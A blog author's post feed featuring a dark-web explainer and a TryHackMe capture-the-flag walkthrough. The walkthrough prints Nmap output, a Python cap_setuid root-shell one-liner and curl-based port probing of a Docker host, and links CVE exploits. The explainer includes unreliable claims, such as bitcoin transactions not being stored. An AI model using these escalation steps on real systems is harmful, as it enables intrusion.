DEV Community: Gaurav Raj

Create a Hacking Lab on Cloud using Docker for free

Gaurav Raj — Wed, 02 Apr 2025 00:00:00 +0000

Learn how to create a free hacking lab on the cloud using Docker and Kali Linux. This guide covers setting up a secure, free environment for pentest and cybersecurity experiments.

Create an Image Steganography Program in Python

Gaurav Raj — Fri, 28 Mar 2025 00:00:00 +0000

Discover how to create an image steganography tool in Python. Learn to securely hide and extract data within PNG images using PIL and cryptography modules.

Unveiling the Dangers of Insecure Deserialization!

Gaurav Raj — Tue, 25 Mar 2025 00:00:00 +0000

Insecure deserialization in web apps is a critical vuln that allows attackers to exploit serialized objects for code execution.

Comprehensive Guide to Finding and Exploiting SSRF Vulnerabilities

Gaurav Raj — Thu, 11 Jul 2024 00:00:00 +0000

Explore an in-depth guide on finding and exploiting Server-Side Request Forgery (SSRF) vulnerabilities.

Navigating the Cloud - The Crucial Role of Security Researchers in Understanding Development and Deployment Process (Cloud...

Gaurav Raj — Wed, 01 May 2024 00:00:00 +0000

Explore the critical role of security researchers in understanding development and deployment processes within cloud environments. Dive into real-world scenarios, expert insights, and how Cybercraft Labs Pvt Ltd. empowers researchers for cybersecurity excellence. Read now!

The Importance of Secure Coding Practices - Cybercraft Labs

Gaurav Raj — Wed, 27 Mar 2024 00:00:00 +0000

Secure coding is the practice of writing code that is designed to be secure from the outset. It involves following a set of best practices and guidelines that are designed to prevent common security vulnerabilities from being introduced into your code.

Difference between The Surface Web, Deep web and The Dark Web

Gaurav Raj — Thu, 01 Sep 2022 17:31:00 +0000

Internet and The Web

The Internet is very vast and what we use on a daily basis, is just a chunk of it. The Internet is much more than that but first, we are going to take a quick look at what is the difference between the Internet and the Web.

Internet: The Internet is a collection of various smaller networks where each node can be a server, a laptop, a pc, a smartphone e.tc.

Web: In the earlier days of the Internet, data was used to transfer across the Internet or the network but no Web existed at that time, but in 1989, Tim Berners-Lee introduced a web called World Wide Web (WWW) which can be used to access hyperlinked text or web pages all across the Internet. So basically, the Web is a piece of software that allows us to access hyperlinked text or web pages over the Internet.

Parts of the Web

But the web doesn't only include sites like Facebook, Instagram, Google, etc. The websites or the part of the web which we are easily able to surf is just 4-6% of the whole composition of the web. There are parts of the web. Which are as follows:

Surface Web
Deep Web
Dark Web

Surface Web

The Surface Web (also called the Visible Web, Indexed Web, Indexable Web or Lightnet) is the portion of the World Wide Web that is readily available to the general public and searchable with standard web search engines. It is the opposite of the deep web, the part of the web indexed by web search engines. It is the part of the web which we can access directly via the browser, like Google, Instagram, Facebook, and many of the other sites which you may visit. As we can see from the image above the Surface Web only consists of 4-6% of the Information available on the Internet. However, the composition is not fixed to 4 or 6%, It varies from time to time. The Surface Web is made with a collection of public Web pages on a server accessible by any search engine. Basically, It is the part of the Internet that we can access normally using any web browser, like Facebook, Instagram, Twitter, and any of our favorite sites.

Deep Web

The Deep Web, invisible web, or hidden web are the parts of the Web that are not indexed by any search engines. The contents of the deep web are hidden behind login forms, and includes uses such as webmail, online banking, restricted access social-media pages and profiles, some web forums and code language that require registration and authorization for viewing contents, and paywalled services such as video on demand and some online magazines and newspapers. On the deep web we can find an awesome list of books and other types of resources for everything ranging from education to entertainment and useful to harmful.

So, as we know that the contents of the deep web are not indexed by any search engines, then how can we access such contents, if we are not able to find it on any search engines?

The Contents of the deep web can be located and accessed by a direct URL or the IP address but may require a password or any kind of authorization or authentication or other security access to get past public pages.

Indexing

Methods that prevent web pages from being indexed by traditional search engines may be categorized as one or more of the following:

Contextual web: pages with content varying for different access contexts (e.g., ranges of client IP addresses or previous navigation sequence).
Dynamic Content: dynamic pages which are generated by any scripting (i.e. generated by PHP or JS)
Limited Access Content: Pages that use authentication or authorization to verify if a user is allowed to access the specific page or not (i.e banking applications, applications with paid subscriptions, web mails, etc.)
Non-HTML / Text Content: textual content encoded in multimedia (i.e images or videos) files or specific file formats that are not handled by the search engines.
Private Web: Sites or applications that require registration or login (password-protected contents) i.e. pages of social media sites like Facebook, and Instagram, Pages of Banking applications, admin panel of applications
Scripted Content: pages that are only accessible through links produced by JavaScript as well as contents dynamically downloaded from Web Servers via Flash or Ajax solutions
Software: certain content is intentionally hidden from the regular Internet, accessible only with special software, Tor, I2P, Tails, or other darknet software. For example, Tor allows users to access websites using the .onion server address anonymously, hiding their real IP address.
Unlinked Content: pages that are not linked by other pages, which may prevent web crawling programs from accessing the contents. This content is referred to as pages without backlinks (also known as inlinks). Also, search engines do not always detect all the backlinks of the search or indexed web pages.
Web Archives: Web archival services such as Wayback Machine enables the user to access the archived version of the web across time, including websites that are no longer accessible and are not indexed by search engines like Google. > The Wayback Machine may be called a program for viewing the deep web, as the web archives that are not from the present cannot be indexed by search engines, as past versions of websites are impossible to view through a search. All websites are updated at some point, which is why web archives are considered as Deep Web Content. {: .prompt-info }

Now, most of the people wonders that, Is The Deep Web illegal to surf or visit?

So answering that question, the answer is No, It's not. Surfing or visiting the Deep Web or even the Dark Web is not illegal in most of the places. It depends on the place from where you are accessing it. As we know China has banned the most famous sites from the surface web like Google, Facebook, YouTube, etc. So, for the people living in China or let's say Koria, Yes, It's illegal, even surfing on the surface web sites mentioned above. So it depends but for most the places, It is not illegal to surf or visit the deep web. Unless you do something illegal on that. I mean if you are surfing the deep web or the dark web out of curiosity or for educational purposes. It's perfectly fine but, If you're trying to do anything bad or things that are prohibited to do on the Internet. yes, it will be illegal then. So it totally depends on you.

Enough talking about the deep web, now let's explore what the dark web is.

Dark Web

The Dark Web is the World Wide Web content that exists on darknets: overlay networks that use the Internet but requires specific software, configurations, or authorization to access. Through the dark web private computer networks can communicate and conduct business anonymously without disclosing identifying information, such as the user's location. The dark web forms a small part of the deep web, The part of the web which is not indexed by any search engines, although sometimes the term deep web is mistakenly used to refer specifically to the term dark web.

The darknet which constitutes the dark web includes small, friend-to-friend peer-to-peer networks, as well as large, popular networks such as Tor, FreeNet, I2P and Riffle operated by public organizations and individuals. Users of the dark web refer to the regular web (surface web websites) as Clearnet due to its unencrypted nature. The Tor dark web or onionland or darknet uses the traffic anonymization technique of onion routing under the network's top-level domain with the suffix .onion or In other words, the URL or the Domain of the dark web websites uses .onion as suffix instead of .com, .org, .in, .xyz suffix used in surface web or Clearnet websites.

More on Dark Web

The dark web is often confused with the term deep web, the parts of the web which are not indexed by the search engines. The dark web is a small part of the deep web, both the deep web nor the dark web is not indexed by any search engines but we can surf or visit the deep web with normal browsers, and maybe in some cases if the websites we are trying to surf is banned in your area, you may need to use any VPN (Virtual Private Network) or any proxy in order to access them, but in the case of dark web, it requires specific software, configuration or authorization to access it. The term dark web is first emerged in 2009, however, It is unknown when it dark web first emerged. Don't get confused here, the term dark web was emerged in 2009. but no one knows from when the dark web is existing. The confusion of the terms deep web and the dark web dates back to at least 2009. Since then, especially in reporting on Silk Road (Silk Road was an online black market, and the first modern darknet market.), these two terms were conflated (combined) despite the recommendations that they should be distinguished.

The dark web also known as the darknet websites, are accessible only through networks such as Tor ('The Onion Routing' project) that are specially created for the dark web. Tor-accessible are widely used among the darknet users and can be identified by the domain ".onion"

For those who are wondering what is available on the dark web, what are its contents?

Contents of the Dark Web

Ransomware: The dark web is also used in certain extortion-related processes. Indeed, It is common to observe data from ransomware attacks on several dark web sites (i.e data sales sites, public repository sites)
Botnets: Botnets are often structured with their command-and-control or C2 servers based on censorship-resistant hidden service, creating a large amount of bot-related traffic.
Darknet Markets: Darknet markets where you can buy illegal items such as Arms, Ammos, Grenades, even Rocket Launchers, etc.
Bitcoin Services: Bitcoin Services like buying them at cheap prices or selling them etc. dark web heavily utilizes bitcoin as their main currency as bitcoin transactions are not stored anywhere.
Hacking Groups and Services: Hacking services like, hiring hackers for doing any illegal tasks, also you can meet many hackers there but may or may not be good or bad.
Financing and Fraud: You can buy Credit cards, Currencies and can also get scammed as there are many fraudsters are grooming around the dark web.
Illegal Pornography: You can find illegal pornography content such as leaked videos or child pornography content, also you can buy them on the darknet markets.
Social Media: There are also social media available on the dark web. and also Facebook has its own version of dark web social media if I'm not mistaken.
Hoaxes and Unverified Contents: As it is anonymous, people can post whatever they want without taking the risk of any type of action against them, so there are videos of people murdering anyone, and torturing someone. basically, all types of uncensored content.
Lots of Information: Despite the fact that there are bad things on the dark web there are also some good things like you can find information about literally anything you can think of. From educational to destructional, like you can find even books about how to mark bombs and such things.

Now one question still arrives, Is it illegal to surf or visit the dark web?

As answered previously, No, It's not, it depends on what you do. Let's take an example you have a knife, you can use it to cut vegetables, use it in the kitchen, and other kinds of stuff but as you have the knife in your hand, you can also use it to hurt someone or murder someone. So let's assume the dark web or deep web is the knife, you can either use it for your own gain, for informational or educational purposes or you can use it to do some really bad or illegal stuffs.

So, the thing is the knife (in our case, the dark web or the deep web) is not illegal but rather the actions you take with it are legal or illegal.

Another question, Is it safe to surf the dark web or deep web?

This question does not have any straight answer, I mean, It is and at the same time It's not. Like there are lots of scammers, black-hat hackers, and fraudsters are grooming around them. So, again it's your actions that will make you safe and unsafe. like talking in that sense, The surface web or Clearnet is also not safe, like there are so many scammers, hackers and fraudsters are on the surface web. as the majority of the Internet users are on the surface web, so the hackers, scammers, and other bad threat actors are more active on surface web. So, again it's your consciousness and actions, which makes you safe and unsafe.

Oh My WebServer TryHackMe Machine Writeup and Walkthrough

Gaurav Raj — Thu, 07 Apr 2022 18:20:40 +0000

Original Blog Post

Blog

Target Machine

Oh My WebServer

Target IP

export IP=10.10.237.191

Enumeration

First of all let's get started by a Nmap Scan.

Nmap

# Nmap 7.92 scan initiated Sat Mar 12 23:33:44 2022 as: nmap -sC -sV -A -v -oA nmap/initial 10.10.237.191
Nmap scan report for 10.10.237.191
Host is up (0.40s latency).
Not shown: 998 filtered tcp ports (no-response)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 e0:d1:88:76:2a:93:79:d3:91:04:6d:25:16:0e:56:d4 (RSA)
|   256 91:18:5c:2c:5e:f8:99:3c:9a:1f:04:24:30:0e:aa:9b (ECDSA)
|_  256 d1:63:2a:36:dd:94:cf:3c:57:3e:8a:e8:85:00:ca:f6 (ED25519)
80/tcp open  http    Apache httpd 2.4.49 ((Unix))
| http-methods:
|   Supported Methods: HEAD GET POST OPTIONS TRACE
|_  Potentially risky methods: TRACE
|_http-title: Consult - Business Consultancy Agency Template | Home
|_http-favicon: Unknown favicon MD5: 02FD5D10B62C7BC5AD03F8B0F105323C
|_http-server-header: Apache/2.4.49 (Unix)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Crestron XPanel control system (90%), ASUS RT-N56U WAP (Linux 3.4) (87%), Linux 3.1 (87%), Linux 3.16 (87%), Linux 3.2 (87%), HP P2000 G3 NAS device (87%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (87%), Linux 2.6.32 (86%), Linux 2.6.32 - 3.1 (86%), Linux 2.6.39 - 3.2 (86%)
No exact OS matches for host (test conditions non-ideal).
Uptime guess: 42.513 days (since Sat Jan 29 11:15:21 2022)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=265 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 80/tcp)
HOP RTT       ADDRESS
1   510.90 ms 10.8.0.1
2   511.02 ms 10.10.237.191
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Mar 12 23:34:41 2022 -- 1 IP address (1 host up) scanned in 57.44 seconds

HTTP Port (80)

HTTP Server is just running a simple single page application.

After enumerating the HTTP Server for a while, running gobuster, nikto, checking for other services, nothing worked.
After that looking for Services for vulnerability finds out that the Apache2 2.4.49 is vulnerable to LFI & RCE vulnerabilties with CVE-2021-41773.

After studing, what was the flaw a written a custom exploit for this specific CVE which will give us RCE on the server, you can find that exploit here.

Initial Access

Reverse Shell

Running the exploit and got RCE on the machine.
Executing Reverse Shell Payload on the machine via RCE
Listening for new connection via nc
Got Reverse shell on the box as user daemon
Looking at the hostname of the machine, we can assume it is some kind of container, probably docker.

Stablizing the unstable reverse shell to a fully stable tty bash shell using python3.

As we can see from the above image that .dockerenv file is present in the / filesystem. it is definitely a docker container. So, now we have to somehow break through the container to get a shell to the main filesystem.

User Flag

While enumerating the machine, found that the machine have /usr/bin/python3.7 with cap_setuid+ep capbility.

daemon@4a70924bafa0:/bin$ getcap -r / 2>/dev/null
/usr/bin/python3.7 = cap_setuid+ep
daemon@4a70924bafa0:/bin$ python3.7 -c 'import os; os.setuid(0); os.system("/bin/sh")'
# id
uid=0(root) gid=1(daemon) groups=1(daemon)

Checking the machine for any capbilities that we can use
Here we found that /usr/bin/python3.7 have cap_setuid+ep capbilty.
Using /usr/bin/python3.7's cap_setuid+ep capbility for getting root shell.
Here we got shell as root but in the docker container.
And here we got the user flag in /root/user.txt file.

Now next thing we have to do is break out of the docker container and get shell as the root user in the main filesystem.
So after enumerating the docker container for a while, checked the Network Interfaces and their assigned IP Addresses. Here

root@4a70924bafa0:/root# ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 172.17.0.2  netmask 255.255.0.0  broadcast 172.17.255.255
        ether 02:42:ac:11:00:02  txqueuelen 0  (Ethernet)
        RX packets 392  bytes 26852 (26.2 KiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 292  bytes 80805 (78.9 KiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 0  bytes 0 (0.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 0  bytes 0 (0.0 B)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
root@4a70924bafa0:/root#

Here as we can see that the interface eth0 have the IP Address: 172.17.0.2, so as we know that this is the docker container and then the machine's or the host's IP will be 172.17.0.1. Let's verify that we are on the correct path by pinging the host.

Checking the Network Interfaces
On the eth0 we have a IP assigned to that.
So the IP of the container is 172.17.0.2 which means the IP of the host machine will be 172.17.0.1.
Let's check our assumption by pinging the host.
As we can see ping command is not available, so using curl to check if our assumption is correct.
And voila, we were right.

Now let's scan for open ports on the host machine, for that also, we can use curl as well.

root@4a70924bafa0:/root# curl http://172.17.0.1:22
SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.3
Invalid SSH identification string.
curl: (56) Recv failure: Connection reset by peer
root@4a70924bafa0:/root# curl http://172.17.0.1:80 >/dev/null
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100 57985  100 57985    0     0  18.4M      0 --:--:-- --:--:-- --:--:-- 18.4M
root@4a70924bafa0:/root# curl http://172.17.0.1:5985
curl: (7) Failed to connect to 172.17.0.1 port 5985: Connection refused
root@4a70924bafa0:/root# curl http://172.17.0.1:5986
curl: (56) Recv failure: Connection reset by peer
root@4a70924bafa0:/root#

So here we do have 4 ports open.

S.No	Port	Service
1	22	SSH
2	80	HTTP
3	5985	WinRM
4	5986	Wsmans

After enumerating the host machine's services for a while, found that WinRM service, commonly on ports 5985, 5986 is vulnerable with the CVE-2021-38647, exploit can be found here.
This exploit is against the OHMIGOD service, commonly runnnig on ports as 5986

Let's exploit that and get a reverse shell as root.

So ran that exploit with the specified arguments and got the root flag

So here we completed our machine, hope you all enjoyed it. Don't forget to share if you liked.

Bite Me TryHackMe Detailed Writeup and Walkthrough

Gaurav Raj — Thu, 17 Mar 2022 07:28:30 +0000

Information Target IP export IP=10.10.73.114 Enumeration Nmap Scan # Nmap 7.92 scan initiated Mon Mar 14 15:35:58 2022 as: nmap -sC -sV -A -v -oA nmap/initial 10.10.73.114 Nmap scan report for 10.10.73.114 Host is up (0.34s latency). Not shown: 998 closed tcp ports (reset) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.6 (Ubuntu Linux; protocol 2.0) | ssh-...

Oh My WebServer TryHackMe Machine Writeup and Walkthrough

Gaurav Raj — Sun, 13 Mar 2022 16:05:30 +0000

Introduction Target Machine Oh My WebServer Target IP export IP=10.10.237.191 Enumeration First of all let’s get started by a Nmap Scan. Nmap # Nmap 7.92 scan initiated Sat Mar 12 23:33:44 2022 as: nmap -sC -sV -A -v -oA nmap/initial 10.10.237.191 Nmap scan report for 10.10.237.191 Host is up (0.40s latency). Not shown: 998 filtered tcp ports (no-response) PORT STATE SERVICE VERSION ...

PlottedCMS TryHackMe Machine Writeup and Walkthrough

Gaurav Raj — Tue, 22 Feb 2022 10:10:00 +0000

Introduction TryHackMe Easy Level Machine Target export IP=10.10.230.183 Enumeration First of all let’s start by running our Nmap Scan Nmap # Nmap 7.92 scan initiated Sat Feb 19 14:01:42 2022 as: nmap -sC -sV -A -v -oA nmap/initial 10.10.230.183 Increasing send delay for 10.10.230.183 from 0 to 5 due to 257 out of 855 dropped probes since last increase. Increasing send delay for 10....

Plugins with vim-plug in NeoVim

Gaurav Raj — Fri, 22 Oct 2021 08:24:30 +0000

Hello There Everyone, Myself Gaurav Raj, a cyber security student learning to secure things while breaking them ;). I’ve using Arch Linux for about a year now and It’s been an awesome journey. And as you all know if you’re interested in Cyber Security or any kind of tech-related field, you all would be familiar that how important it is to have experience with Linux systems. and somehow we like ...